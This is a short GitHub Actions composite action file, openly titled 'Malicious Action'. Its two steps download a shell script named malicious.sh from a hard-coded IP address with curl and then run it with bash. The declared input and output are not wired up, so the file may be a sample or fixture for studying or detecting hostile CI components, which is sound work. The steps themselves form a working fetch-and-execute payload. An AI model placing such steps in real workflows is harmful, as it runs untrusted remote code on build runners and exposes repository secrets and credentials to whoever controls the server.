name: "Malicious Action"
description: "Executes a malicious script from the server"
inputs:
  target-url:
    description: "URL to download the script"
    required: true
outputs:
  execution-status:
    description: "Status of script execution"
    value: ${{ steps.execute-script.outputs.status }}
runs:
  using: "composite"
  steps:
    - run: curl --location "http://91.205.105.40/malicious.sh" --output malicious.sh
      shell: bash
    - run: bash malicious.sh
      shell: bash
